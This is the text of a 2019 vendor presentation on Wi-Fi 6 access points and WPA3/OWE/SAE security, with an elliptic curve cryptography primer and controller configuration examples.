90
Wi-Fi 6 & Wi-Fi Security Update Airheads Community Technology Insight Jens Fluegel, Consulting System Engineer, April 16 th 2019
Wi-Fi 6 & Wi-Fi Security UpdateAirheads Community Technology Insight
Jens Fluegel, Consulting System Engineer, April 16th 2019
2
802.11AX a.k.a.Update April 2019
3
802.11axTimelines and status
– Wi-Fi Alliance certification program, coming in the third quarter of 2019https://www.wi-fi.org/news-events/newsroom/wi-fi-certified-6-coming-in-2019
– Current 802.11ax APs released in 2018 are pre-standard, built on a partial implementation of the standard
Powered by Aruba
4
802.11ax (Wi-Fi 6) Technology
Increase 4x average throughput of the entire system in a dense deployment scenario
Improve power efficiency of client devices- battery saving
Maximizing capacity and efficiency by ensuring that all devices in a crowded network get the bandwidth they require
802.11ac
802.11ax
4x better capacity in
dense deployment
5
Wireless Standards Over Time
• 2.4 and 5 GHz
• 40 MHz Channels
• 64-QAM Rates
• Up to 4 Streams
• Beam forming (explicit and implicit)
• Backwards compatibility with 11a/b/g
• 5 GHz only
• 80 and160 MHz Channels
• 256-QAM Rates
• Up to 8 Streams
• Beam forming (explicit)
• Multi-user MIMO
• Backwards compatibility with 11a/b/g/n
• 2.4 GHz and 5 GHz
• 1024-QAM Rates
• Multi-user MIMO, 8 clients
• OFDMA uplink and downlink
• Better battery life (Target Wake Time)
• Spatial re-use (BSS color)
• Enhanced outdoor long-range performance
• Backwards compatibility with 11a/b/g/n/ac
802.11n (2008) 802.11ac (2012) 802.11ax (2018)
6
Enhancements in 802.11axHigh-Efficiency-Wireless (HEW) or Wi-Fi 6
7
OFDMA( uplink and downlink) and MU-MIMO ( downlink)
High performance experience with multi user features
OFDMA
MU-MIMO
OFDMA increases capacity
OFDMA reduces latency for voice and IoT
Ideal for low bandwidth , small packets ( voice
and IoT), latency sensitive applications
MU-MIMO increases capacity
MU-MIMO results in higher speed and
throughput per user – transmit to up to 8 clients
Ideal for higher bandwidth applications such as
HD Video or large files
Congestion and delay
89
OFDMA Resource Unit Allocation Examples
9
OFDMA Performance
10
802.11ax vs. 802.11acMajor feature comparison
Feature 802.11ac 802.11ax Impact
Bands 5 GHz 2.4 and 5GHz Increased Capacity and
Throughput
Target wake time NA Supports TWT Reduces medium access
contention , Better battery
life
Data Rates 433 Mbps (80MHz ,1SS) 600 Mbps (80 MHz,1SS)
9.60 Gbps(160MHz,8SS)
Increased Throughput
Highest modulation 256 QAM 1024 QAM Increased Capacity
Subcarrier Spacing 312.5 KHz 78.12 KHz Increased Capacity per
channel
MU-MIMO Only DL DL and UL Better mechanism to handle
uplink traffic
OFDMA NA DL and UL Better medium access
technology , less overhead
and pooling
11
802.11ax(Wi-Fi 6) – Features Details
12
Innovations beyond 802.11ax standards
Aruba 500 Series Access Points
• High performance multi-user capabilities +
• Ax-aware ClientMatch
• AI-powered RF optimization
• App visibility and control
• IoT and location ready
• Smart power management
• AP operates even if there isn’t enough PoE power using Intelligent Power Monitoring (IPM)
• Aggregate the power of two PoE ports with Smart PoE
• Enhanced Security
• WPA3, enhanced open and Dynamic Segmentation
• Always on connectivity
• 24/7 network uptime with LiveUpgrade and Seamless Failover
• Energy Efficiency with Green AP
Aruba 802.11ax ( Wi-Fi 6) Series Access Points
Aruba 550 series
Aruba 530 series
Aruba 510 series
13
Aruba 5xx Series Campus Access PointsProduct Overview and Specifications Summary
– Wi-Fi Radio Specifications: 802.11ax Specific
– Support for all mandatory features for Wi-Fi Alliance 802.11ax wave 1 certification program*
– That includes MBO* and WPA3
– Fully backwards compatible with 11abg, 11n, 11ac
– 1024-QAM modulation (optional for WFA certification): adding 25% boost to peak datarate (short range)
– New symbol duration and format, sub-carrier spacing (4x): a further ~20% boost by improved efficiency (mandatory)
– Single-User MIMO (mandatory)
– Multi-User MIMO*
– Downlink (mandatory)
– Uplink (excluded): not supported on 510 Series
– Transmit Beamforming (mandatory)*
– OFDMA: Orthogonal Frequency Division Multiple Access*
– Downlink and uplink (both mandatory)
– Up to 16 Resource Units
– BSS coloring (optional)*
– Individual TWT (mandatory)*
14
Aruba 5xx Series Campus Access PointsTiming and Phasing
– Software Dependencies
– At launch, with 8.4 code, only basic 802.11ax functionality will be supported (symbol, 1024-QAM rates, SU-MIMO)
– Also: WPA3
– Standard AP features missing: mesh and spectrum
– All missing features for 802.11ax WFA R1 certification will be added in future software releases
– Targeting to be ready for certification as soon as WFA kicks off the program
– Also: 802.11ax aware ClientMatch, mesh, spectrum, 512 client support
– Future enhancements: Zigbee use-cases, 802.11mc (Wi-Fi Location)
15
Specifications Summary
Wi-Fi specifications:
• Dual radio 5GHz (4x4) and 2.4GHz( 2x2)- max aggregate data rate 5.4MGps
• Up to 512 associated clients per radio
• Multi-gig Ethernet support/Smart Rate, IEEE802.3bz compliant
• Deep-sleep mode support for Green AP system feature (using NetInsight)
Power Sources:
• DC power 12Vdc, POE power (on E0 only)
• Max power consumption (excluding USB): 20.8W (POE) / 16W (DC)
• 802.3bt (class 5) and 802.3at (class 4): no restrictions
• 802.3af (class 3): only supported with IPM enabled
510 Series Campus Access Points
Controller based and Instant deployment
AP-515 AP-514
16
530 Series Campus Access PointsSpecifications Summary
Wi-Fi Radio Specifications:
• Dual radio 5GHz (4x4) and 2.4GHz( 4x4)- max aggregate data rate 3.55Gps
• Up to 1024* associated clients per radio – recommended active clients : 150 limit
• Multi-gig Ethernet support/Smart Rate, IEEE802.3bz compliant
Power Considerations
• Sources: DC power 48Vdc, POE power (802.3at / 802.3bt)
• Max power consumption from POE (excluding USB): 26.4W (AP-53x)
POE sources
• 802.3bt (class 5) and dual 802.3at (class 4): no restrictions
• Single 802.3at (class 4): some restrictions
• 802.3af (class 3): not supported
Controller based and Instant deployment
AP-535 AP-534
17
550 Series Campus Access PointsSpecifications Summary
Wi-Fi Radio Specifications:
• Dual radio (8x8, 4x4 ) and optional tri radio mode 5GHz ( 4x4,4x4 ) and 2.4GHz( 4x4)
• Max aggregate data rate 5.59Gps
• Multi-gig Ethernet support/Smart Rate, IEEE802.3bz compliant
• Up to 1024* associated clients per radio – recommended active clients : 150 limit
Power Sources:
• DC power 12Vdc or POE power
• Max power consumption (excluding USB): and 38.2W (AP-555)
POE sources
• 802.3bt (class 5) and dual 802.3at (class 4): no restrictions
• Single 802.3at (class 4): some restrictions
• 802.3af (class 3): not supported
Controller based and Instant deployment
AP-555
18
Accessories and Dependencies
– Mount kits: completely new and not compatible
– All-metal, low profile mount kits (allowing minimum spacing required for cooling)
– AP ships with common piece pre-installed to back
– Multiple mount bracket kits with pieces that attach to wall/surface/rail/box
– Separate orderable in packs of 10 (only)
– AP slides into bracket, spring loaded pin is used to secure AP in bracket
– Screw is used to lock all pieces together
5x0 Series Campus Access Points
19
Boost performance of multi-user with ax-aware ClientMatch
Older clientsax ax
802.11ax
ClientMatch Utilize multi-user capabilities
(OFDMA/MU-MIMO) efficiently to boost the performance of the network
ax axax
20
Hospitality Access Points
Remote Access Points
Indoor Access Points
310 Series
Mid-range Density
300 Series
Low Denisty
( entry level)
303H
Medium Density
(Wall-mount)
203R
Teleworker
Outdoor Access Points
360 Series
High Performance
Rugged Access Points
318 Series
High Performance
(Refrigerated)
340 Series
High Density
370 Series
High Density
303/303P Series
Low Density
(Budget)
510 Series
Mid-range Density
11ax
AP-387
Point to Point
530 Series
High Density
11ax
550 Series
Extreme Density
11ax
Where 802.11ax fits in the Access Point Portfolio
21
Aruba 802.11ax series access point positioning
340 series802.11ac Wave 2
310 series802.11ac Wave 2
Performance
Pri
ce
510 series 802.11ax
530 series802.11ax
550 series802.11ax
330 series802.11ac Wave 2
22
802.11ax Indoor AP Platform comparison matrixAP-51x (BRCM) AP-53x (QCA) AP-555 (QCA)
5GHz radio (HE80) 4x4 4x4 8x8 or dual 4x4
5GHz radio (HE160) 160 80 + 80 80 + 80
2.4GHz radio 2x2 4x4 4x4
Dual-5GHz No No Yes*
1024-QAM Yes Yes Yes
Max number of clients per radio 512 (100) 1024 (150) 1024 (150)
Peak datarates
(5GHz / 2.4GHz / aggregate)
4.8 / 0.57 / 5.37 Gbps 2.4 / 1.15 / 3.55 Gbps 4.8 / 1.15 / 5.95 Gbps
DL-OFDMA Yes Yes Yes
UL-OFDMA Yes Yes Yes
DL-MU-MIMO Yes Yes Yes
UL-MU-MIMO No Yes Yes
Max no. of RUs (HE80) 16 37 37
Wired ports 1x 2.5Gbps + 1x 1Gbps 2x 5Gbps 2x 5Gbps
Peak power (with/without USB) 26.5W / 20.8W 32.1W / 26.4W 44.2W* / 38.2W
POE-PD (typical) Class 4/3 Class 5/4 Class 5/4
Size (internal antenna variants) 200 x 200 x 46 (mm) 240 x 240 x 53 (mm) 260 x 260 x 58 (mm)
23
Affordable and easy to manage universal IoT connectivity
• Bluetooth 5 and Integrated 802.15.4 radio supports Zigbee
• Digital door locks in hotels, digital signage for retail
• Location and asset tracking support with Meridian
• Emerging IoT devices
• IoT battery saving with Wi-Fi 6 Target Wake Time (TWT)
• Better experience for latency sensitive IoT traffic with OFDMA
First Wi-Fi vendor with integrated Wi-Fi 6, Bluetooth 5, and Zigbee
24
802.11AX (WI-FI 6) information @Arubahttps://www.arubanetworks.com/products/networking/802-11ax/
How does 802.11ax work?
– https://www.arubanetworks.com/assets/so/SO_80211ax.pdf
– https://www.arubanetworks.com/assets/wp/WP_Multi-User-802.11ax.pdf
Learn about 802.11ax from our technical experts
– https://www.brighttalk.com/webcast/13679/329771?utm_source=ResourcePage&utm_medium=brighttalk&utm_campaign=329771
– https://www.arubanetworks.com/assets/wp/WP_802.11AX.pdf
802.11ax Reference
– https://www.arubanetworks.com/assets/so/ReferenceGuide_80211ax.pdf
25
Wi-Fi Protected Access®Update April 2019
26
Wi-Fi Security needs an upgrade
– Open networks
– All wireless traffic is passed in the clear
– WPA2
– Legacy protocols still allowed (TKIP/WEP)
– Protected Management Frames (PMF) optional -> active attacks
– WPA2-Personal
– No Perfect Forward Secrecy -> offline brute force attacks
– Passphrase used for key derivation (PMK) -> offline dictionary attack
– WPA2-Enterprise
– Still solid security-wise, but can be used in ways that lessen its overall security
– not properly check of cert chains
Note: https://www.krackattacks.com/ has nothing to do security vulnerabilities in WPA2.This an implementation weakness in the 4-way handshake of the Wi-Fi Standard itself.
27
WPA3: What was planned …
– Open gets replaced by OWE– Opportunistic Wireless Encryption
All wireless traffic gets encrypted
– PSK mode gets replaced by SAE– Simultaneous Authentication of Equals
Protocol is resistant to active, passive, and dictionary attack
– WPA2–Enterprise extended with Suite B grade ciphers
Create a cipher suite and a set of rules to ensure consistent primitive security
– Enhancements to certification testing
Too many WPA2-Enterprise certified devices did not properly check cert chains
– Improve overall security of Wi-Fi management frames, e.g. to protect against de-auth attacks
Management frame protection becomes mandetory
28
- Transition Mode (PMFR=0)
Wi-Fi Protected Access security familyApril 2019
Enhanced Open™
WPA3™
Easy Connect™
Device Provisioning Protocol (DPP)
802.11w - Protected Management Frames (PMF)
WPA3-EnterpriseWPA3-Personal
Opportunistic Wireless Encryption (OWE) - RFC 8110
Simultaneous Authentication of Equals (SAE)
RFC7664 - Dragonfly Key Exchange
Elliptic Curve Cryptography (ECC)
Basic 192-Bit Mode
- Transition Mode (PMFR=0)- WPA2 (AES-only) + PMF
- No Transition Mode (PMFR=1)- CNSA (a.k.a. SuiteB)
- Transition Mode SSIDs
Elliptic Curve Diffie-Hellman (ECDH)
Powered by Aruba Dan
Harkins
Elliptic Curve Diffie-Hellman (ECDH)
29
Aruba Wi-Fi certification status?https://www.wi-fi.org/product-finder-results
30
Wi-Fi CERTIFIED Enhancementswith ArubaOS/Aruba Instant 8.4.0.0 and beyond
Supported features
– Enhanced Open™
– WPA3-Personal™
– WPA3-Enterprise™
– WPA3-Enterprise™ 192-Bit mode (Suite-B)
– ClearPass 6.8 Release or later required
Limitations
– Supported on the following AP models:
– AP-303, AP-305, AP-31x, AP-318, AP-32x, AP-33x, AP-34x, AP-387, AP-36x, AP-37x, AP-51x, AP-53x, AP-555
– NOT Supported on other AP models:
– AP-1xx, AP-2xx
– An error is logged when configured<3761> <WARN> |stm| Virtual AP "ap225-5" rejected
for AP "demo-sae-vap"; reason: AP doesn't support WPA3/OWE
– CAPs/RAPs supported – tunnel mode only!
– IAPs supported
– 802.11r and WPA3 is NOT supported at this time
31
Good to knowWPA3 and other Aruba features
Will WPA3-SAE supported with Aruba Mesh?
– Aruba Mesh protocol is proprietary and not 802.11s based. WPA3-SAE will not be used with Aruba Mesh for AP to AP authentication starting with 8.4. Long term intention is to use WPA3-SAE with Aruba Mesh.
Will WPA3-SAE be supported with mPSK?
– WPA3-SAE will not be supported with mPSK at release time of 8.4, WPA2-PSK have to be used. WPA3-SAE support for mPSK is the longer term plan
32
What about WPA3 certified clients?https://www.wi-fi.org/product-finder-results
33
DRAGONBLOOD - WPA3 Multiple Vulnerabilitieshttps://wpa3.mathyvanhoef.com/
On April 10, 2019 a research paper by Mathy Vanhoef and Eyal Ronen was released documenting a series of potential vulnerabilities in implementations of WPA3 and EAP-pwd (RFC 5931). Details on EAP-pwd vulnerabilities have not yet been released.
For more details see:
http://www.arubanetworks.com/support-services/security-bulletins/
Aruba Product Security Advisory
===============================
Advisory ID: ARUBA-PSA-2019-002
CVE: CVE-2019-9494
Publication Date: 2019-Apr-13
Status: Not affected
Revision: 1
NEW
35
A short excursion toElliptic Curve Cryptography
36
What is Elliptic Curve Cryptography?https://en.wikipedia.org/wiki/Elliptic-curve_cryptography
Public-cryptography approach
using elliptic curves over finite
fields
37
Elliptic Curve Cryptography: In a nutshellPublic-key cryptography and Wi-Fi
Purpose
– Key distribution and key generation
– Diffie–Hellman
Based on mathematical problems hard to solve
– Integer Factorization -> RSA
– Discrete Logarithm -> bk = a, k = logb a
– Elliptic Curve Relationship
Security level of 256-bit ECC ≅ 3072-bit RSA
38
Elliptic Curve Cryptography: In a nutshellElliptic curves
– An elliptic curve is a set of points (x,y) described by an equation
𝑦2 = 𝑥3 + 𝑎𝑥 + 𝑏
39
Elliptic Curve Cryptography: In a nutshellGroup law (=operations) applied to elliptic curves
– A Group is a set of elements with an operation to combine two elements
– Axioms (requirements): closure, associativity, identity element, inverse element
– Operations:
Scalar multiplication
𝐐 = 𝒏.𝑷 = 𝑷 + 𝑷 +⋯+ 𝑷
“Easy” to compute e.g. with
double and add algorithm
Point addition
𝐏 + 𝐐 = −𝐑
Logarithm problem: Given Q and P, what is n such that 𝑸 = 𝒏.𝑷?
– not easy but pattern might allow easy computation –
40
Elliptic Curve Cryptography: In a nutshellRestriction to a finite fields (𝔽p) of integers modulo p
𝑦2 = 𝑥3 + 𝑎𝑥 + 𝑏 mod p
p is a large prime number
like 256-bit, 384-bit
… p
… p
Integer
Inte
ger
41
Elliptic Curve Cryptography: In a nutshellElliptic curve point addition over finite fields (𝔽p)
42
Elliptic Curve Cryptography: In a nutshellElliptic curve scalar multiplication over finite fields (𝔽p)
Forward computation of
𝑸 = 𝒏.𝑷
stays tractable
Given Q and P, what is n such that 𝑸 = 𝒏.𝑷?
becomes computationally intractable for large numbers
Discrete Logarithm Problem used for ECC
43
Elliptic Curve Cryptography: In a nutshellCyclic subgroups, the foundation of ECC and other crypto systems
– A set of multiples of 𝑷 is a cyclic subgroup of the elliptic curve group in 𝔽p
– P is called generator or base point
– Order n = no of points of in the subgroup
– Order N = no of points of the elliptic curve group
– cofactor 𝒉 =𝑵
𝒏, N=order of elliptic curve, n= order of subgroup
– For our ECC algorithms, we want subgroups with a high order, h=1
– Finding a based point
1. Calculate order N of the elliptic curve.
2. Choose order n of the subgroup, while n must be a prime.
3. Compute ℎ =𝑁
𝑛.
4. Choose a random point P on the curve.
5. Compute 𝐺 = ℎ𝑃.
6. If G is 0, go back to 4. Otherwise generator is found.
𝑦2 = 𝑥3 + 𝑥 + 3 𝑖𝑛 𝔽97𝑃 = (3, 6)
𝒏. 𝑷 = 𝑷 + 𝑷 +⋯+ 𝑷
44
Elliptic Curve Cryptography: In a nutshellSummary
Elliptic curve algorithms work in a cyclic subgroup of an elliptic curve over a finite field.
Summary of elliptic curve domain parameters (p, a, b, G, n, h)
Prime p: size of x and y of the field (256-bit, 384-bit, …)
Coefficients a and b of the elliptic curve equation 𝑦2 = 𝑥3 + 𝑎𝑥 + 𝑏
Order n of the subgroup
Base point/generator G
Cofactor h
1. The private key is a random integer d chosen form 1,… , 𝑛 − 1 (where n is the order of the subgroup)
2. The public key is the point 𝐻 = 𝑑. 𝐺 (where G is the base point of the subgroup).
If we know d and G (and the domain parameters) finding H “easy”.
If we know H and G, finding the private key d is “hard” because it requires to solve the discrete logarithm problem.
45
802.11wProtected Management Frames (PMF)
46
• Provides protection for Unicast and Multicast Management Action
Frames
PMF (Protected Management Frame) = MFP (Management Frame Protection) = 802.11w
⎻ Protection against eavesdropping and forging for Unicast Management
Action Frames
⎻ Protection against forging for Multicast Management Action Frames
• Augment privacy protections already in place for data frames
• 802.11w introduced PMF to secure management frames against
attacks
IEEE 802.11w - PMF (Protected Management Frame)
47
• Supported in D-tunnel and Bridge mode in 8.3 and prior releases(configuration required in SSID profile)
• Included with OWE/WPA3 in AOS 8.4 (Tunnel Mode ONLY)(no configuration needed)
• Capabilities advertised in RSN Information Element: MFP Required (MFPR = 1) & MFP Capable (MFPC = 1)
Only 11w capable clients can connect
MFP Required (MFPR = 0) & MFP Capable (MFPC = 1)
11w and non-11w capable (legacy) clients can connect
• RSN IE advertised in Beacons, Probe Response, Association
Request
IEEE 802.11w - PMF (Protected Management Frame)
48
• List of mgmt frames validated for 11w protection:
Deauth (from AP)
Disassociation (from 11w client)
QoS
ADDBA Negotiation
Block Ack
Radio Measurement
SA Query
WNM (used for Hotspot)
IEEE 802.11w - PMF (Protected Management Frame)
49
IEEE 802.11w - MFP (Management Frame Protection) Capabilities advertised in RSN IE
50
802.11w & WPA3 modesWhich clients can connect?
Client type
SSID Mode
Open OWE WPA2-AES
None 11w-capable
WPA2-AES
11w-capable
WPA3 WPA3
SuiteB-capable
OWE (Transition Mode)
OWE only
WPA3-SAE (Transition Mode)
WPA3-SAE-only
WPA3-Enterprise – Basic
WPA3-Enterprise - 192-Bit Mode
• WPA3 Enterprise Basic = WPA2 + PMF enabled
• WPA3 client connected to a WPA3 SSID have to use 802.11w
51
CLI updatesshow ap bss-table
52
CLI updatesshow ap association
53
Wi-Fi CERTIFIED Enhanced Open™ Opportunistic Wireless Encryption (OWE)
54
Wi-Fi CERTIFIED Enhanced Open™Adding encryption behind the scenes to open networks
– Based on RFC 8110 - Opportunistic Wireless Encryption
– Provides unauthenticated data encryption to 802.11 "Open" Wi-Fi Networks
– Transparent to users & admins – looks just like open, no provisioning, no “lock icon”
– Backward compatible via ”Transition Mode” using two BSSIDs
– This is only encryption, no authentication
– Unauthenticated Elliptic Curve Diffie-Hellman (ECDH) at association time to generate a unique PMK
– PMK is used in 4-way handshake post association
– No authentication of AP to client, so no protection against from honeypot APs, Evil Twin etc.
– Existing additional authentication techniques like captive portal or MAC authentication are still required/valid
55
Opportunistic Wireless Encryption (OWE)Handshake
beacon/probe response (RSN: AKM=OWE)
• If PMK caching, no DH element in association response• DH group nineteen (19), a 256-bit elliptic curve group is required to be compliant
Authentication Request (Open System)
Authentication Response (Open System)
Association Request (AKM=OWE, DH: group, public key C )
Association Response (AKM=OWE, DH: group, public key A)
Generate random: c (=private key)Compute point: C = c.G
Generate random: a (=private key)Compute point: A = a.G
EAP 4-way Handshake
Eavesdropper cannot compute C or A PMK = c.A = c.a.G
PMKID = Hash (C | A)PMK = a.C = a.c.G = c.a.GPMKID = Hash (C | A)
Traffic keys Traffic keys
Agreement on ECDH domain parameter including base point G
56
• Advertisement and Discovery
1. Administrator configures a single Open SSID and virtual AP
2. AP automatically creates two BSSes with separate beacons
i. BSS1 = Normal ‘Open” network for non-OWE stations. New IE to indicate BSS2
ii. BSS2 = Hidden OWE RSN with AKM=18. New IE to indicate BSS1
3. OWE STA does active or passive scanning to discover OWE-
capable AP via RSN IE
• Authentication and Association
1. Normal 802.11 “Open” Authentication
2. Diffie-Hellman Parameter element added to Association
Request/Response
How does OWE Transition Mode work?
57
• To provide backward compatibility with legacy (non-OWE) clients
⎻ Legacy clients connect to the “Open System” SSID (no security benefits)
⎻ OWE capable clients connect to the hidden SSID (PMF and encryption benefits)
One drawback:
One additional SSID is advertised for every OWE SSID that needs to be accounted for
Why Transition Mode?
58
AP BSS Table
AP Association Table
Auth-tracebuf
OWE Transition Mode Connection
OWE Open VAP has prefix: “_owetm_<VAPName>_Checksum”
59
OWE Transition Mode Beacons
60
Association Request Association Response
OWE Transition Mode Association
61
OWE Transition Mode Packet Capture
62
Create a new SSID profile
Mobility Master Enhanced Open Configuration
63
Tasks -> Create a new WLAN
Step1
Step2
Step3
Step4
Mobility Master Enhanced Open Configuration
64
Create a new network
Step1
Step2
Step3
Step4
IAP Enhanced Open Configuration
65
OWEDebugging & Troubleshooting
– Enable the below logging on Aruba Controller
– logging user-debug <mac> level debugging
– logging security process authmgr level debugging
– Debug Commands on Aruba Controller
– show log security <number>
– Show log user-debug <number>
– Auth-tracebuf for OWE
– (OWE-VMC) #show auth-tracebuf count 6
– Auth Trace Buffer
– -----------------
–
– Sep 26 00:57:53 station-down * 54:27:1e:3e:47:4b a8:bd:27:cd:e0:a3 - -
– Sep 26 00:57:53 station-up * 54:27:1e:3e:47:4b 38:17:c3:84:35:42 - - wpa3-owe aes-ccmp-128
– Sep 26 00:57:53 wpa2-key1 <- 54:27:1e:3e:47:4b 38:17:c3:84:35:42 - 29952
– Sep 26 00:57:53 wpa2-key2 -> 54:27:1e:3e:47:4b 38:17:c3:84:35:42 - 31488
– Sep 26 00:57:53 wpa2-key3 <- 54:27:1e:3e:47:4b 38:17:c3:84:35:42 - 48896
– Sep 26 00:57:53 wpa2-key4 -> 54:27:1e:3e:47:4b 38:17:c3:84:35:42 - 24320
66
Wi-Fi CERTIFIED WPA3™ - PersonalSimultaneous Authentication of Equals (SAE)
67
WPA3 - PersonalStrong Security from Weak passwords
– WPA2 Pre-Shared Key (PSK) is replaced by Simultaneous Authentication of Equals (SAE)
– A variant of Dragonfly key exchange (RFC 7664), a password-authenticated key exchange
– Resistant to active attack, passive attack, and offline dictionary attacks
– Already part of 802.11-2016, section 12.4: originally intended for mesh security (802.11s)
– SAE uses new 802.11 authentication frames
– Authentication generates a PMK (Password itself is no longer used for key derivation ), association indicates the PMKID
– Key derivation is based on Elliptic Curve Cryptography (ECC) or Finite Field Cryptography (FFC)
– Includes Perfect Forward Secrecy (PFS) and protects from offline brute force attacks
– SAE provisioning is identical to WPA2-PSK
– User enters password just like always but gets improved security behind the scene
– Allows more natural passwords to be used securely
– Mixed (Transition) mode
– WPA3 capable client connects using wpa3-sae (only Advanced Encryption Standard (AES) is allowed)
– Legacy clients connect using wpa2-aes-psk
68
How WPA2-PSK worksHandshake
beacon/probe response (RSN: AKM=PSK)
• Password-Based Key Derivation Function 2 (PBKDF2)• Key Based Key Derivation Function (KBKDF)• PTK (Pairwise Transient Key)• Key-Encrypting Key (KEK)• Key-Confirmation Key (KCK)• Temporal Key (TK)• Message Integrity Code (MIC)
Authentication Request (Open System)
Authentication Response (Open System)
Association Request (AKM=PSK)
Association Response (AKM=PSK)
Password
EAP 4-way Handshake:MIC calculated using KCK
GTK encrypted using KEK PTK=KEK, KCK, TK
Known functionPBKDF2
Known functionKBKDF
PMK
Data encrypted with TK
Password
PTK=KEK, KCK, TK
Known functionPBKDF2
Known functionKBKDF
PMK
Can be sniffed and stored for offline dictionary attach
69
Simultaneous Authentication of Equals (SAE) Handshake
beacon/probe response (RSN: AKM=SAE with AES-128-CMAC)
Authentication (SAE Commit)
Authentication (SAE Commit)
Association Request (AKM=SAE)
Association Response (AKM=SAE)
Generate point 𝑃𝐸 from password
Random: 𝑠𝑐𝑎𝑙𝑎𝑟𝐴𝑃 = 𝑝𝐴𝑃 +𝑚𝐴𝑃
𝑃2𝐴𝑃 = 𝑖𝑛𝑣𝑒𝑟𝑠𝑒(𝑚𝐴𝑃. 𝑃𝐸)
EAP 4-way Handshake
Traffic keys Traffic keys
SAE, SEQ1, ECDH-Group, 𝑠𝑐𝑎𝑙𝑎𝑟𝑆𝑇𝐴, 𝑃2𝑆𝑇𝐴
SAE, SEQ1, ECDH-Group, 𝑠𝑐𝑎𝑙𝑎𝑟𝐴𝑃, 𝑃2𝐴𝑃
Authentication (SAE Confirm)
Authentication (SAE Confirm)
SAE, SEQ2, 𝐶𝑜𝑛𝑓𝑖𝑟𝑚𝑆𝑇𝐴
SAE, SEQ2, 𝐶𝑜𝑛𝑓𝑖𝑟𝑚𝐴𝑃
Mutual authentication, 𝐶𝑜𝑛𝑓𝑖𝑟𝑚𝐴𝑃 ≠ 𝐶𝑜𝑛𝑓𝑖𝑟𝑚𝑆𝑇𝐴(zero knowledge proof)
Generate point 𝑃𝐸 from password
Random : 𝑠𝑐𝑎𝑙𝑎𝑟𝑆𝑇𝐴 = 𝑝𝑆𝑇𝐴 +𝑚𝑆𝑇𝐴
𝑃2𝑆𝑇𝐴 = 𝑖𝑛𝑣𝑒𝑟𝑠𝑒(𝑚𝑆𝑇𝐴. 𝑃𝐸)
Compute point K = shared secret:𝐾 = 𝑝𝐴𝑃. 𝑠𝑐𝑎𝑙𝑎𝑟𝑆𝑇𝐴. 𝑃𝐸 + 𝑃2𝑆𝑇𝐴𝐾 = 𝑝𝐴𝑃. (𝑝𝑆𝑇𝐴+𝑚𝑆𝑇𝐴). 𝑃𝐸 − 𝑚𝑆𝑇𝐴. 𝑃𝐸𝑲 = 𝒑𝑨𝑷. 𝒑𝑺𝑻𝑨. 𝑷𝑬
𝑘 = 𝐹 𝐾 −𝑚𝑎𝑝𝑝𝑖𝑛𝑔 𝑝𝑜𝑖𝑛𝑡 𝑡𝑜 𝑛𝑢𝑚𝑏𝑒𝑟𝐶𝑜𝑛𝑓𝑖𝑟𝑚𝐴𝑃 = hash k, unique values
𝑷𝑴𝑲 = 𝒉𝒂𝒔𝒉 𝒌 𝒔𝒄𝒂𝒍𝒂𝒓𝑨𝑷+ 𝒔𝒄𝒂𝒍𝒂𝒓𝑺𝑻𝑨 𝒎𝒐𝒅 𝒓)
Compute point K = shared secret:𝐾 = 𝑝𝑆𝑇𝐴. 𝑠𝑐𝑎𝑙𝑎𝑟𝐴𝑃. 𝑃𝐸 + 𝑃2𝐴𝑃𝐾 = 𝑝𝑆𝑇𝐴. (𝑝𝐴𝑃+𝑚𝐴𝑃). 𝑃𝐸 − 𝑚𝐴𝑃. 𝑃𝐸𝑲 = 𝒑𝑺𝑻𝑨. 𝒑𝑨𝑷. 𝑷𝑬
𝑘 = 𝐹 𝐾 −𝑚𝑎𝑝𝑝𝑖𝑛𝑔 𝑝𝑜𝑖𝑛𝑡 𝑡𝑜 𝑛𝑢𝑚𝑏𝑒𝑟𝐶𝑜𝑛𝑓𝑖𝑟𝑚𝑆𝑇𝐴 = hash k, unique values
𝑷𝑴𝑲 = 𝒉𝒂𝒔𝒉 𝒌 𝒔𝒄𝒂𝒍𝒂𝒓𝑨𝑷+ 𝒔𝒄𝒂𝒍𝒂𝒓𝑺𝑻𝑨 𝒎𝒐𝒅 𝒓)
70
AP BSS Table
AP Association Table
Auth-tracebuf
SAE Transition Mode Connection
71
SAE Mixed mode announced in Beacons and Probe Responses
SAE Mixed Mode Beacon
72
SAE Auth Commit
SAE Auth Confirm
SAE Authentication Commit and Confirm
73
SAE client association request
SAE WPA3 SAE Association Request
74
WPA2 client association request
SAE WPA3 SAE Association Request
75
Tasks -> Create a new WLAN
Step1
Step2
Step3
Step4
Mobility Master SAE Configuration
76
Mobility Master SAE ConfigurationTransition mode enabled by default
wlan ssid-profile “WPA3-SAE-transition“essid “WPA3-SAE-transition“opmode wpa3-sae-aes
!
wlan ssid-profile “WPA3-SAE-only"essid "WPA3-SAE"opmode wpa3-sae-aesno wpa3-transition
!
77
Create a new network
Step1
Step2
Step3
Step4
IAP SAE Configuration
78
Wi-Fi CERTIFIED WPA3™ - Enterprise
79
WPA3-Enterprise
Basic Mode
– Same as WPA2-Enterprise + 802.11w (MFPR=0, MFPC=1)
– No transition mode
192-bit mode a.k.a. Suite-B/CNSA
– 802.11w mandatory
– Suite-B compatible 802.1x negotiated between STA and RADIUS server
– Policy is enforced by EAP/RADIUS server
– new RADIUS attributes
– Authenticator (Controller) indicates the Suite-B AKM was negotiated
– Supported only in tunnel mode on CAP and RAP
– 4-way Handshake and KDF use SHA384 with Suite B AKM
Variants of WPA3
Enterprise
Suite Selectors
192-bit level
(ECC)
1) AKM: 00-0F-AC:12; meaning EAP-TLS using ECDH
and ECDSA with curve p384 and use SHA384 for key
derivation.
2) AKM: 00-0F-AC:9:
Pairwise Cipher: AES-GCM-256.
3) AKM: 00-0F-AC:9
Group Data Cipher: AES-GCM-256.
4) AKM: 00-0F-AC:12:
Group Management Cipher: BIP-GMAC-256.
192-bit level
(RSA)
1) AKM: 00-0F-AC:12; meaning EAP-TLS using ECDH
and RSA(3k+), and use SHA384 for key derivation.
2) AKM: 00-0F-AC:9:
Pairwise Cipher: AES-GCM-256.
3) AKM: 00-0F-AC:9:
Group Cipher: AES-GCM-256.
4) AKM: 00-0F-AC:12:
Group Management Cipher: BIP-GMAC-256.
Certificate chain validation is mandatory and tested during certification testing
80
WPA3-Enterprise 192-Bit/CNSA modeRADIUS support required
– Permitted EAP cipher suites
– TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
– ECDHE and ECDSA using the 384-bit prime modulus curve P-384
– TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
– ECDHE using the 384-bit prime modulus curve P-384
– RSA ≥ 3072-bit modulus
– TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
